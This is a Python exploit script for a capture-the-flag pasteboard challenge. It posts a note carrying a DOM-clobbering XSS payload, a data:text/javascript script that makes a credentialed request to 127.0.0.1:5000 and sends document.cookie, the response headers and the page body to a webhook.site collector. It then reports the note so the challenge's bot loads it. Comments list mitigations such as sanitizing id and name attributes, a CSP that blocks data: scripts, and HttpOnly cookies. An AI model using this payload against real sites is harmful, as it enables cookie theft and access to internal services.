import requests

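# Challenge instance under test and the out-of-band collector that the
# injected script reports to.
BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# Alternative: Use XHR which has better access to response details
# Or use an img/iframe to leak via error messages
# Or make bot post a form to our webhook with credentials included

# Note body submitted to the pasteboard.
#
# Markup: a <form id="errorReporter"> holding an <input name="path"> whose
# value is a data:text/javascript URL, plus an <img id="renderConfig"> whose
# onerror sets window.lastRenderError and throws.
# NOTE(review): presumably the page's own script reads `errorReporter` /
# `renderConfig` as window globals (DOM clobbering) and loads `path` as a
# script; confirm against the challenge source, which is not shown here.
#
# Script: a synchronous (third argument `false`), credentialed XHR to
# http://127.0.0.1:5000/, then a POST of document.cookie, the response
# headers and the first 1000 characters of the body to WEBHOOK + "/XHR".
#
# What the script can and cannot see (the properties a defender relies on):
#   * document.cookie never contains HttpOnly cookies.
#   * getAllResponseHeaders() never returns Set-Cookie; browsers treat it
#     as a forbidden response-header name.
#   * The XHR response is readable only when the note page is same-origin
#     with http://127.0.0.1:5000 or that server opts in through CORS.
# If the assumption above holds, the matching mitigations are a sanitizer
# that strips or namespaces id/name attributes, a CSP whose script-src does
# not allow data:, and HttpOnly on the session cookie.
#
# The collector URL is interpolated from WEBHOOK rather than repeated, so
# the payload cannot drift from the constant. Literal JavaScript braces are
# doubled because this is an f-string.
payload = f'''<form id="errorReporter"><input name="path" value="data:text/javascript,
var xhr = new XMLHttpRequest();
xhr.withCredentials = true;
xhr.open('GET', 'http://127.0.0.1:5000/', false);
xhr.send();
var response = xhr.responseText;
var allCookies = document.cookie;
fetch('{WEBHOOK}/XHR', {{
  method: 'POST',
  body: JSON.stringify({{
    cookies: allCookies,
    responseHeaders: xhr.getAllResponseHeaders(),
    response: response.substring(0, 1000)
  }})
}});
"></form>
<img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">'''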

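print("[*] Using XMLHttpRequest to capture response headers...")
print()

# Bounded wait so a stalled or unreachable instance cannot hang the script.
REQUEST_TIMEOUT = 10  # seconds

session = requests.Session()

# Create the note. Redirects are not followed, so the 302's Location header
# (the path of the new note) can be read directly.
resp = session.post(
    f"{BASE_URL}/note/new",
    data={"title": "XHR", "body": payload},
    allow_redirects=False,
    timeout=REQUEST_TIMEOUT,
)

location = resp.headers.get("Location")
if resp.status_code == 302 and location:
    # Location is appended to BASE_URL as-is.
    # NOTE(review): this assumes the server returns a relative path; confirm.
    note_url = f"{BASE_URL}{location}"

    print(f"[+] Created: {note_url}")

    # Submit the note path to /report, reusing the same session.
    # NOTE(review): presumably this queues the note for the challenge's bot
    # to visit, and 202 means "accepted"; verify against the server.
    report = session.post(
        f"{BASE_URL}/report",
        data={"url": location},
        timeout=REQUEST_TIMEOUT,
    )
    if report.status_code == 202:
        print("[+] Reported!")
        print()
        print("[*] Check webhook for POST to /XHR")
        # Caveat: browsers withhold Set-Cookie from getAllResponseHeaders(),
        # and document.cookie omits HttpOnly cookies, so the hint printed
        # below is optimistic about what the collector will receive.
        print("[*] responseHeaders might contain Set-Cookie!")
        # Viewer URL derived from WEBHOOK so the two cannot drift apart.
        print(f"    https://webhook.site/#!/{WEBHOOK.rsplit('/', 1)[-1]}")
    else:
        # Previously a rejected report ended the script with no output.
        print(f"[-] Report not accepted (HTTP {report.status_code})")
else:
    # Previously a non-302 reply was silent, and a 302 with no Location
    # header produced a URL ending in "None".
    print(f"[-] Note not created (HTTP {resp.status_code}, Location={location!r})")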
